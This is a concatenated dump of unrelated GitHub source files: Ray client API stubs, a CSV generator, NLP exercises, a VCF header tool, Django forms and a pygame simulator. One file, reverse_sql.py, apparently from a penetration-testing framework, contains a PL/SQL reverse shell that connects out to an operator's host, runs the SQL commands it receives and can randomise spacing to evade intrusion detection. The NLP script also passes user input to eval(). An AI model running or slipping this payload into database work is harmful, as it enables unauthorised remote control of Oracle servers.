# Only the core Ray API implementation should actually `import ray`
# (and thus import all the raylet worker C bindings and such).
# But to make sure that we're matching these calls, we define this API.
from abc import ABC
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Union
if TYPE_CHECKING:
from ray.experimental.client.common import ClientStub
from ray.experimental.client.common import ClientObjectRef
from ray._raylet import ObjectRef
# Use the imports for type checking. This is a python 3.6 limitation.
# See https://www.python.org/dev/peps/pep-0563/
PutType = Union[ClientObjectRef, ObjectRef]
class APIImpl(ABC):
"""
APIImpl is the interface to implement for whichever version of the core
Ray API that needs abstracting when run in client mode.
"""
@abstractmethod
def get(self, *args, **kwargs) -> Any:
"""
get is the hook stub passed on to replace `ray.get`
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def put(self, vals: Any, *args,
**kwargs) -> Union["ClientObjectRef", "ObjectRef"]:
"""
put is the hook stub passed on to replace `ray.put`
Args:
vals: The value or list of values to `put`.
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def wait(self, *args, **kwargs):
"""
wait is the hook stub passed on to replace `ray.wait`
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def remote(self, *args, **kwargs):
"""
remote is the hook stub passed on to replace `ray.remote`.
This sets up remote functions or actors, as the decorator,
but does not execute them.
Args:
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def call_remote(self, instance: "ClientStub", *args, **kwargs):
"""
call_remote is called by stub objects to execute them remotely.
This is used by stub objects in situations where they're called
with .remote, eg, `f.remote()` or `actor_cls.remote()`.
This allows the client stub objects to delegate execution to be
implemented in the most effective way whether it's in the client,
clientserver, or raylet worker.
Args:
instance: The Client-side stub reference to a remote object
args: opaque arguments
kwargs: opaque keyword arguments
"""
pass
@abstractmethod
def close(self) -> None:
"""
close cleans up an API connection by closing any channels or
shutting down any servers gracefully.
"""
pass
class ClientAPI(APIImpl):
"""
The Client-side methods corresponding to the ray API. Delegates
to the Client Worker that contains the connection to the ClientServer.
"""
def __init__(self, worker):
self.worker = worker
def get(self, *args, **kwargs):
return self.worker.get(*args, **kwargs)
def put(self, *args, **kwargs):
return self.worker.put(*args, **kwargs)
def wait(self, *args, **kwargs):
return self.worker.wait(*args, **kwargs)
def remote(self, *args, **kwargs):
return self.worker.remote(*args, **kwargs)
def call_remote(self, instance: "ClientStub", *args, **kwargs):
return self.worker.call_remote(instance, *args, **kwargs)
def close(self) -> None:
return self.worker.close()
def __getattr__(self, key: str):
if not key.startswith("_"):
raise NotImplementedError(
"Not available in Ray client: `ray.{}`. This method is only "
"available within Ray remote functions and is not yet "
"implemented in the client API.".format(key))
return self.__getattribute__(key)
| [
"noreply@github.com"
] | oliverhu.noreply@github.com |
7003c2b3092fee3719bcdfa6911960bce8955313 | 151ed184329fa65ef0a22a76336984ae41587db6 | /GenerateCSV.py | 9e124f0efe5dffe3f6b763d72545a6557cf28a47 | [] | no_license | SherDG/Oxygen2020 | ce05fb0142009339c83dfe4bf898217a0159a8ba | 3ca80138ed515d396152933b8a3a9e79e92d0151 | refs/heads/master | 2022-12-19T15:35:07.630301 | 2020-09-19T09:00:57 | 2020-09-19T09:00:57 | 289,451,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python
# Import of the libraries
import csv
import random
# def - is a function
def createCsvLine(arr):
# print(arr)
return '"' + '","'.join(arr) + '"\n'
#number of the inserts
records=10
#print("Making %d records\n" % records)
# names of the columns
fieldnames=['id','name','age','city']
#open file, w - is for write
writer = open("people.csv", "w")
# base of names and cities
names=['Deepak', 'Sangeeta', 'Geetika', 'Anubhav', 'Sahil', 'Akshay']
cities=['Delhi', 'Kolkata', 'Chennai', 'Mumbai']
# column names write in file
writer.write(createCsvLine(fieldnames))
# loop must start empty value
item = []
for i in range(0, records):
# str(i) - id to string
# random.choice(names) - random choice from names
# str is for string
#
item = [str(i),random.choice(names),str(random.randint(24,26)), random.choice(cities)]
# push item to the file
writer.write(createCsvLine(item))
writer.close()
| [
"dsherstiuk@cloudlinux.com"
] | dsherstiuk@cloudlinux.com |
b2698d399ebf21fb08f31d626543f73cb31cc86d | 8888ef245f962b7745ce3d95ff8412618cb7efad | /NLP_2015/4/section4.py | 8c60240e273ddfac67b092387319f39bd2de84f8 | [] | no_license | tegetege/tegetege_NLP_100 | 6b3305479426c61660362f0a8c8c8ca3a803636d | 5d90509db268d5977a369a157f636c718955dd9c | refs/heads/master | 2021-05-05T04:27:32.074757 | 2020-09-27T09:20:14 | 2020-09-27T09:20:14 | 118,591,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,433 | py |
class Section_4():
'''
[問い]
夏目漱石の小説『吾輩は猫である』の文章(neko.txt)をMeCabを使って形態素解析し,
その結果をneko.txt.mecabというファイルに保存せよ.
[使用コマンド]
$mecab -d /usr/local/lib/mecab/dic/mecab-ipadic-neologd neko.txt -o neko.txt.mecab
辞書にはオプションで、"mecab-ipadic-NEologd"を利用
'''
'''
[概要]
・neko.txt ファイルをmecabに通したものがneko.txt.mecab
・self.word_listはneko.txt.mecabの単語部分のリスト
・self.morphemesはneko.txt.mecabの形態素部分のリスト
'''
def __init__(self):
#クラス内でデータを格納するリストを管理
self.word_list = [] #単語部分のリスト
self.morphemes = [] #形態素部分のリスト,word_listに同期
'''
(※)問題を読み違えていたため、このコメント部分はお釈迦
#ss5で利用変数
#self.longest_list_num = 0 #最も長い連接の最初のリストナンバー
#self.longest_count = 0 #最も長い連接回数を記録
'''
#形態素解析結果の読み込み
def ss0(self):
'''
こんな感じで表現したい
{
surface: '皇帝',
base: '皇帝',
pos: '名刺',
pos1: '一般'
},
'''
'''
########
データ形成をする上でエラーが出るため、neko.txt.mecabの最後の
空白行を消去した。
########
'''
with open("neko.txt.mecab", "r") as f:
data = f.read()
data = data.split('\n') #データ形成 : リスト化
#データ形成 : 不要なEOS要素を削除
while 'EOS' in data:
data.remove('EOS')
for i in range(len(data)):
data[i]= data[i].split('\t') #データ形成 2次元配列化
self.word_list.append(data[i][0]) #単語の部分をリスト化
if len(data[i]) > 1: #エラー回避
self.morphemes.append(data[i][1].split(',')) #形態素部分をリスト化
else:
pass
for i in range(len(self.word_list)):
print(i)
print('surface',':',self.word_list[i])
print('base',':',self.morphemes[i][6])
print('pos',':',self.morphemes[i][0])
print('pos1',':',self.morphemes[i][1])
print('-------------------------')
def make_data(self):
with open("neko.txt.mecab", "r") as f:
data = f.read()
data = data.split('\n') #データ形成 : リスト化
#データ形成 : 不要なEOS要素を削除
while 'EOS' in data:
data.remove('EOS')
for i in range(len(data)):
data[i]= data[i].split('\t') #データ形成 2次元配列化
self.word_list.append(data[i][0]) #単語の部分をリスト化
if len(data[i]) > 1:
self.morphemes.append(data[i][1].split(',')) #形態素部分をリスト化
else:
pass
#動詞
def ss1(self):
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] =='動詞':
print('-------------------------')
print('surface',':',self.word_list[i])
print('pos',':',self.morphemes[i][0])
#動詞の原形
def ss2(self):
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] =='動詞':
print('-------------------------')
print('surface',':',self.word_list[i])
print('base',':',self.morphemes[i][6])
#サ変名詞
def ss3(self):
'''
>見当 名詞,サ変接続,*,*,*,*,見当,ケントウ,ケントー
これを抜き出してくれば良いだけなので難しくない
'''
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.morphemes[i][0] == '名詞' and self.morphemes[i][1] == 'サ変接続':
print('-------------------------')
print('サ変名詞',':',self.word_list[i])
#「AのB」
def ss4(self):
'''
2つの名詞が「の」で連結されている名詞句を抽出せよ
・「の」しか入っていないword_list番号を記録して、その前後の形態素を確認する
'''
self.make_data() #データ生成
for i in range(len(self.word_list)):
if self.word_list[i] == 'の':
if self.morphemes[i-1][0] == '名詞' and self.morphemes[i+1][0] == '名詞':
print('-------------------------')
print('番号:',i)
print(self.word_list[i-1],self.word_list[i],self.word_list[i+1])
print(self.morphemes[i-1][0],self.morphemes[i][0],self.morphemes[i+1][0])
#名詞の連接
def ss5(self):
'''
(※)出題内容がわからなかったため「素人の言語処理100本ノック」を
参考にさせていただきました。
https://qiita.com/segavvy/items/bda3a16d8bb54bd01f73
'''
self.make_data() #データ生成
noun_list = [] #重複ありのリスト
nouns = [] #一時的に名詞を保持するリスト
for i in range(len(self.word_list)):
if self.morphemes[i][0] == '名詞' :
nouns.append(self.word_list[i]) #一時保持
else:
#名詞ではないときは、一時保持リストからアペンドして本リストに入れる
if len(nouns) > 1:
noun_list.append(''.join(nouns))
nouns = []
nouns_set = set(noun_list) #集合化することで、重複を消す!! ⇦ これ、知った時に感動した
print(nouns_set)
#単語の出現頻度
def ss6(self):
'''
文章中に出現する単語とその出現頻度を求め,出現頻度の高い順に並べよ.
参考:http://www.freia.jp/taka/blog/356/index.html
'''
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
for k, v in sorted(words_dic.items(), key=lambda x: -x[1]):
#降順 → x: -x[1] 昇順 → x: x[1]
if int(v) > 500: #500以下は表示しない
print(str(k) + ": " + str(v))
#ss6と同じもの、最後に辞書データをreturnする
def sorted_word_dic(self):
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
return sorted(words_dic.items(), key=lambda x: -x[1])
#ソートしていない単語と出現頻度の辞書データをreturnする
def word_dic(self):
self.make_data() #データ生成
words_dic = {}
#カウンティング
for i in range(len(self.word_list)):
#.get()メソッドを利用すれば、辞書にアイテムが無い場合の初期値を設定できる
words_dic[self.word_list[i]] = words_dic.get(self.word_list[i],0) + 1
#辞書の降順ソート
return words_dic
#頻度上位10語
def ss7(self):
'''
出現頻度が高い10語と語とその出現頻度をグラフで表示すること
matplotlibを利用する
'''
import matplotlib.pyplot as plt
import numpy as np
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
sorted_dic = {}
sorted_dic = self.sorted_word_dic() #出現頻度によってソート済みのリストを受け取る
'''
sorted_dic = [('の', 9114), ('。', 7484), ('、', 6772), ....]
'''
label = []
count = []
for i in range(0,10):
label.append(sorted_dic[i][0]) #x軸の名前
count.append(sorted_dic[i][1]) #y軸
left = np.array(range(0,10)) #x軸には、0から始まるリストを入れる
height = np.array(count)
plt.bar(left,height,tick_label=label, align="center")
plt.show()
#ヒストグラム
def ss8(self):
'''
単語の出現頻度のヒストグラム(横軸に出現頻度,縦軸に出現頻度をとる単語の種類数を棒グラフで表したもの)を描け.
X軸 出現頻度
Y軸 単語の種類数
[1]
参考になりそうなサイト:
https://pythondatascience.plavox.info/matplotlib/%E3%83%92%E3%82%B9%E3%83%88%E3%82%B0%E3%83%A9%E3%83%A0
[2]
1つのキーに複数の値が対応するハッシュを作る:
http://lightson.dip.jp/zope/ZWiki/1191_e3_81_a4_e3_81_ae_e3_82_ad_e3_83_bc_e3_81_ab_e8_a4_87_e6_95
_b0_e3_81_ae_e5_80_a4_e3_81_8c_e5_af_be_e5_bf_9c_e3_81_99_e3_82_8b_e3_83_8f_e3_83_83_e3_82_b7_e3_83
_a5_e3_82_92_e4_bd_9c_e3_82_8b
'''
import matplotlib.pyplot as plt
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
word_dic = {}
word_dic = self.word_dic() #出現頻度によってソート済みのリストを受け取る
count_frequency = {} #出現回数と、その単語のリストが入った辞書
for k,v in word_dic.items():
count_frequency.setdefault(v,[]).append(k) #サイト[2]を参考にした
'''
count_frequency =
{...,278: ['寒月'], 974: ['です'], 97: ['ええ'],
146: ['私'], 343: ['迷亭'], 433: ['…']...}
↓
↓
ヒストグラムに投げるデータ(リスト型)
[1,1,1,1,....,234,234,235,235,235,236,236....]
'''
count_frequency_sort = sorted(count_frequency.items(), key=lambda x: x[0])
hist_list = []
for i in range(len(count_frequency_sort)):
for j in range(len(count_frequency_sort[i][1])):
#ここ頭悪い
#出現回数分、出現回数をリストに追加する
hist_list.append(int(count_frequency_sort[i][0]))
#ヒストグラムにデータをセットしていく
plt.hist(
hist_list,
bins = 20,
range=(1,20))
plt.xlim(xmin=1, xmax=20)
# グラフのタイトル、ラベル指定
plt.title("38. ヒストグラム")
plt.xlabel('出現頻度')
plt.ylabel('単語の種類数')
# グリッドを表示
plt.grid(axis='y')
# 表示
plt.show()
#出現頻度が入ったリストが帰ってくる
def frequency_list(self):
import matplotlib.pyplot as plt
word_dic = {}
word_dic = self.word_dic() #出現頻度によってソート済みのリストを受け取る
count_frequency = {} #出現回数と、その単語のリストが入った辞書
for k,v in word_dic.items():
count_frequency.setdefault(v,[]).append(k)
count_frequency_sort = sorted(count_frequency.items(), key=lambda x: x[0])
return count_frequency_sort
#Zipfの法則
def ss9(self):
'''
単語の出現頻度順位を横軸,その出現頻度を縦軸として,両対数グラフをプロットせよ.
'''
import matplotlib.pyplot as plt
import numpy as np
#日本語を表示するフォントを指定する
import matplotlib as mpl
mpl.rcParams['font.family'] = 'AppleGothic'
frequency_2D_list = self.frequency_list()
frequency_list = [] #x軸:順位
word_count_list = [] #y軸:出現頻度
for i in range(len(frequency_2D_list)):
frequency_list.append(frequency_2D_list[i][0])
word_count_list.append(len(frequency_2D_list[i][1]))
plt.xscale('log')
plt.yscale('log')
plt.xlim(1,len(frequency_list)+1)
plt.ylim(1,word_count_list[0])
x = frequency_list
y = word_count_list
plt.title("39. Zipfの法則")
plt.plot(x,y,'o')
plt.show()
num = input('サブセクション番号入力:')
do = Section_4()
ss_num = 'ss' + str(num)
eval('do.' + ss_num + '()') #入力した数字の関数を実行 | [
"t.tose@uec.ac.jp"
] | t.tose@uec.ac.jp |
1b16e6e3300a0e361ece4ca07a41c908f4cba675 | 02717951f753acec835bfe3630ccb8bb89e213d1 | /lib/vcf_header_clean.py | 2dfb95603aa09ec5b128490f16b3492c3ad31f0a | [
"MIT"
] | permissive | uiuc-bioinf-club/vcf_anno | 6b87246d3e6e258c53de560bbe530accd30a9968 | 9fbf0d7597ec5f66a81b91a7ff0c3fd33d865640 | refs/heads/master | 2020-04-16T05:27:48.866844 | 2019-01-11T20:48:38 | 2019-01-11T20:48:38 | 165,306,182 | 0 | 0 | null | 2019-01-11T20:35:51 | 2019-01-11T20:35:50 | null | UTF-8 | Python | false | false | 2,201 | py |
import re
def vcfheader_clean(IN_vcf_file, OUT_vcf_header_file):
"""
Check whether a vcf file contains description with comma in them, which may raise warnings for some vcftools version such as vcftools-0.1.16
"""
#IN_vcf_file = vcf_file
#OUT_vcf_header_file = './header_commaclear.tmp.vcfheader'
FIX_COMMA = 0
new_header_list = []
with open(IN_vcf_file, 'r') as vcff:
for line in vcff:
if(line[0]!="#"):
break
if(line[0:2] == '##' and line.split("=")[0] in ["##INFO", "##FORMAT"]):
## check comma in the description part of INFO.
description_after = re.search(r'Description\=.+\>', line)
if(description_after):
if("," in description_after.group()):
FIX_COMMA = 1
description_after_commaclear = description_after.group().replace(",", " ").strip()
description_before = re.search(r'.+Description', line).group().replace("Description","")
line_comma_clear = description_before + description_after_commaclear
line = line_comma_clear
new_header_list.append(line.strip())
if(FIX_COMMA):
print("Fixed vcf file header is in : \n"+ OUT_vcf_header_file)
print("It can be used to reheader the vcf file. Example: ")
print("bcftools reheader -h "+ OUT_vcf_header_file + " --output ./newheader.tmp.txt "+ IN_vcf_file + "\n")
with open(OUT_vcf_header_file,'w') as OUTf:
OUTf.write("\n".join(new_header_list))
else:
print("The vcf file is comma-free in INFO tags.")
if __name__ == "__main__":
"""
Generate new comma-free headers for INFO and FORMAT tags in vcffile.
Example: python --vcf
"""
import argparse
parser = argparse.ArgumentParser(description = "clean vcf header")
parser.add_argument('--vcf', required=True, help="vcffile")
parser.add_argument('--newheader', required = False, default = "./newheader.tmp.txt" , help="where to put the new header")
args = parser.parse_args()
vcfheader_clean( args.vcf, args.newheader )
| [
"wingsyiz@gmail.com"
] | wingsyiz@gmail.com |
1d2e0f0ee19889f0cf2814a73fdeea1efce3039c | 0086c318ab4e2f753e91cafbcf6964c592e8c90e | /basic_app/forms.py | 3ce27d669faa19380d77723e5ed5542ccac7fd64 | [] | no_license | yogeshshukla/django-example | 045c7b6d812cdb8d9caf0efae6bfa09fcf694747 | 6c7d752511ad4f9e16a452e950711f0c9ddb6c5b | refs/heads/master | 2022-07-31T21:57:14.956530 | 2020-05-18T10:38:26 | 2020-05-18T10:38:26 | 264,907,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | from django import forms
from django.contrib.auth.models import User
from basic_app.models import UserProfileInfo
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta():
model = User
fields = ('username', 'email', 'password')
class UserProfileInfoForm(forms.ModelForm):
class Meta():
model = UserProfileInfo
fields = ('portfolio_site', 'profile_pic') | [
"yogesh.shukla@infobeans.com"
] | yogesh.shukla@infobeans.com |
11f463800b1550cd3bd4d4ae92bec076ebab5ff8 | 3bf004648ac22448cef6912e775bab46148d0978 | /manage.py | fa5e5760efd27b0af28aab7f5fca8b684ef40f92 | [] | no_license | ncats/zebra_rank | 2f5959cf1886318b66a8b464095156ea4ee7aece | d8fd697c54941cf0739dc0e1a68642113202cadf | refs/heads/master | 2022-11-28T03:11:01.070696 | 2020-08-07T21:39:34 | 2020-08-07T21:39:34 | 281,787,726 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'zebra_rank.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"caodac@gmail.com"
] | caodac@gmail.com |
8cae290d2e0f4814c027458fafbd56b76c6c8859 | e99bc88c211c00a701514761fdfcb9b755e6de4e | /payloads/oracle/reverse_sql.py | c8a4d05996c833f8976901daa94da532f212e589 | [] | no_license | Wuodan/inguma | 177f40f636d363f081096c42def27986f05e37e7 | c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee | refs/heads/master | 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | #!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
user = "TEST"
function = "F1"
useDML = False
covert = 0
verifyCommand = ""
connection = None
type = 0
host = ""
port = ""
connection = None
def __init__(self):
pass
def run(self):
global data
tmp = data
tmp = tmp.replace("%USER%", self.user)
if self.host == "":
self.host = raw_input("Host to connect: ")
if self.port == "":
self.port = raw_input("Port to listen: ")
tmp = tmp.replace("%HOST%", self.host)
tmp = tmp.replace("%PORT%", self.port)
if self.covert > 0:
# Currently only one IDS evasion technique is used
tmp = randomizeSpaces(tmp)
objRun = run_command.CPayload()
objRun.idsTechniques = self.covert
objRun.user = self.user
objRun.command = tmp
ret = objRun.run()
return ret
def verify(self, connection):
sql = self.verifyCommand
cursor = connection.cursor()
cursor.execute(sql)
for x in cursor.fetchall():
return True
return False
def main():
import cx_Oracle
a = CPayload()
a.idsTechniques = 1
cmd = a.run()
print cmd
if __name__ == "__main__":
main()
| [
"muts@kali.org"
] | muts@kali.org |
96c1cabf5d959dc6e574d2108c2fb2098c5f8b1f | a6a946586d91307c4d84d5d3ed9f0d1e7db6cc0b | /newvenv/bin/python-config | 02a31f44f8bd03cfea3297049e7fc189f4500d93 | [] | no_license | kibach/saera_web | 8f47f7062252628d4938059bd015127845b573ba | 94cb86cbbe3061e57ce597e5e45641ebcd85eda7 | refs/heads/master | 2020-12-25T04:21:26.817468 | 2016-06-06T17:28:52 | 2016-06-06T17:28:52 | 60,018,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | #!/Users/Vera_M/labrab3/newvenv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"theassd1337@yandex.ru"
] | theassd1337@yandex.ru | |
d6a5e7f3d5471a1459d2abddaf8a4b271d588aa2 | a0af7c96805b17741675b8ecdf3f3fdc6d149c61 | /simulate.py | c831cb6c3c278768cdd34c02e4ab76032aa921b3 | [] | no_license | ajwood/Group-Dynamics-Simulator | 7e72cf007771df62c23eb2bc6bae7f324f3fa2d0 | fc0a58e83708a8127db0928001f7af9f9fcf60f5 | refs/heads/master | 2020-05-15T10:11:38.817050 | 2012-04-02T01:13:53 | 2012-04-02T01:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,876 | py | #!/usr/bin/python
import pygame
from pygame.locals import *
from boxes import SheepBox
import time
import os
import sys
import numpy as np
import itertools
import math
from functools import partial
import collections
class GameMain():
def __init__( self, color_bg=(0,0,0) ):
pygame.init()
pygame.font.init()
pygame.display.set_caption( "Group Dynamics Simulator" )
self.color_bg = color_bg
self.clock = pygame.time.Clock()
self.limit_fps = True
self.limit_fps_max = 60
# actual size
self.width = 1000
self.height = 700
self.screen = pygame.display.set_mode(( self.width, self.height ))
self.sheep = []
self.options_init()
self.action_panel_init()
self.control_panel_init()
self.game_init()
#self.refresh_distance_matrix()
def game_init(self, color_list=None, init_speed=7):
self.sheep = []
self.add_sheep( self.options.get('n_boxes').value )
def update_n_boxes(self):
n_boxes = self.options.get('n_boxes').value
if n_boxes < len( self.sheep ) :
self.sheep = self.sheep[:n_boxes]
elif n_boxes > len( self.sheep ) :
self.add_sheep( n_boxes - len( self.sheep ) )
def add_sheep(self, n=1, loc_list=None, init_speed=7, color_list=None, name=None, retreat=False):
if loc_list != None and len( loc_list ) != n:
raise Exception( "The sheep are confused about where they're supposed to be..." )
if loc_list == None:
loc_list = []
if color_list == None:
color_list = []
for s in range( n ):
if len( color_list ) > 0:
color = color_list[n % len( color_list )]
else:
color = self.randColor()
if len( loc_list ) > 0:
loc = loc_list[ s ]
else:
loc = self.randLoc()
self.sheep.append( SheepBox(self,
loc,
self.randVelocity(init_speed),
color=color,
name=name,
retreat=retreat,
)
)
def control_panel_init(self):
self.control_panel_rect = Rect( 700, 0, 300, 700 )
self.control_panel = self.screen.subsurface( self.control_panel_rect )
# Create surfaces with our images on them
self.checkbox_unselected = pygame.image.load(os.path.join("graphics","checkbox.png")).convert()
self.checkbox_selected = pygame.image.load(os.path.join("graphics","selected.png")).convert()
self.scroll_bar_left = pygame.image.load(os.path.join("graphics","scroll_bar_left.png")).convert()
self.scroll_bar_right = pygame.image.load(os.path.join("graphics","scroll_bar_right.png")).convert()
# Callbacks for different option types event handling
# Generic boolean button
def boolean_event_handler( opt_name, x, y, click_pos=None ):
if ( self.options.toggle(opt_name) ):
self.screen.blit(self.checkbox_selected, (x,y))
else:
self.screen.blit(self.checkbox_unselected, (x,y))
# Generic int/float slider
def slider_event_handler( opt_name, slider, click_pos=None ):
value = slider.click( click_pos )
self.options.set(opt_name, value)
def n_boxes_event_handler( slider, click_pos=None ):
value = slider.click( click_pos )
self.options.set('n_boxes', value)
self.update_n_boxes()
# Define sliders
# TODO: we might be able to get rid of this list now that we're using
# the functools.partil to close the callbacks
sliders = {}
self.control_buttons = {}
y_offset = 10
for opt in self.options.values():
rect = Rect( 710, y_offset, 100 + 2 * self.scroll_bar_left.get_width(), 20 )
if opt.key == 'n_boxes':
sliders[ 'n_boxes' ] = Slider( self, 710, y_offset, opt )
self.control_buttons[ 'n_boxes' ] = ( rect, partial(n_boxes_event_handler, sliders[ 'n_boxes' ] ) )
elif opt.val_type == bool :
self.control_buttons[ opt.key ] = ( rect, partial(boolean_event_handler, opt.key, 710, y_offset ) )
elif opt.val_type == float or opt.val_type == int:
sliders[ opt.key ] = Slider( self, 710, y_offset, opt )
self.control_buttons[ opt.key ] = ( rect, partial(slider_event_handler, opt.key, sliders[ opt.key ] ) )
y_offset = y_offset + 20
for name, button in self.control_buttons.items():
opt = self.options.get(name)
rect = button[0]
onclick = button[1]
if opt.val_type == bool :
# Draw the checkbox
if self.options.get( name ).value :
self.screen.blit(self.checkbox_selected, (rect.x,rect.y))
else:
self.screen.blit(self.checkbox_unselected, (rect.x,rect.y))
# Draw the label TODO: draw this on control_panel and never update
fontobject = pygame.font.Font( None, 18 )
self.screen.blit( fontobject.render(name, 1, (255,255,255)), (rect.x+20,rect.y) )
elif opt.val_type == float or opt.val_type == int:
onclick()
fontobject = pygame.font.Font( None, 18 )
self.screen.blit( fontobject.render(name, 1, (255,255,255)), (rect.x+140,rect.y) )
def action_panel_init(self):
self.action_panel_rect = Rect(0, 0, 700, 700)
self.action_panel = self.screen.subsurface( self.action_panel_rect )
pygame.draw.rect( self.screen, Color('yellow') , self.action_panel_rect, 3 )
def options_init(self):
    """Declare all tunable simulation options and bind their shortcut keys.

    Each tuple is (key, default_value, shortcut_key, value_type, min, max),
    the exact layout OptionsHandler unpacks.  min/max are None for booleans.
    """
    options = (
        #TODO: should reconsider some of the defaults/min/max
        ('n_boxes', 3, K_n, int, 1, 101 ),
        ('gravity', False, K_g, bool, None, None ),
        ('A0', 0.0015, K_a, float, 0, 0.01 ),
        ('ROI', 200, K_r, int, 0, 400 ),
        #('critical_mass', 40, K_k, int, 40, 500 ),
        ('max_speed', 5, K_m, float, 1, 20 ),
        ('bounce_off_walls', False, K_b, bool, None, None ),
        ('withdraw', False, K_w, bool, None, None),
        ('draw_tail_len', 30, K_l, int, 1, 200, ),
        ('draw_ROI', False, K_d, bool, None, None ),
    )
    self.options = OptionsHandler( options )
    # Bind our shortcut keys to the keyboard bindings dict (key code -> option key)
    self.keyboard_bindings = {}
    for opt in self.options.values():
        if opt.shortcut_key != None:
            self.keyboard_bindings[ opt.shortcut_key ] = opt.key
def editOption( self, key ):
    """Prompt the user (in-game text box) for a new value of *key* and store it.

    Raises UnsupportedOptionException for an unknown key.
    """
    if( not key in self.options.keys() ):
        raise UnsupportedOptionException(key)
    opt = self.options.get( key )
    # drawOption with editable=True blocks, collecting keystrokes until RETURN
    val = self.drawOption( 10, self.height - 30, key, opt.value, editable=True )
    self.options.set(key, val)
def loop(self):
    """Main game loop: handle events -> advance simulation -> redraw, forever."""
    while True:
        self.handle_events()
        self.update()
        self.draw()
        # Throttle to a fixed FPS when limiting is enabled; otherwise just
        # let the clock record the frame time.
        if self.limit_fps: self.clock.tick( self.limit_fps_max )
        else: self.clock.tick()
def update(self):
    """Advance the simulation by one tick.
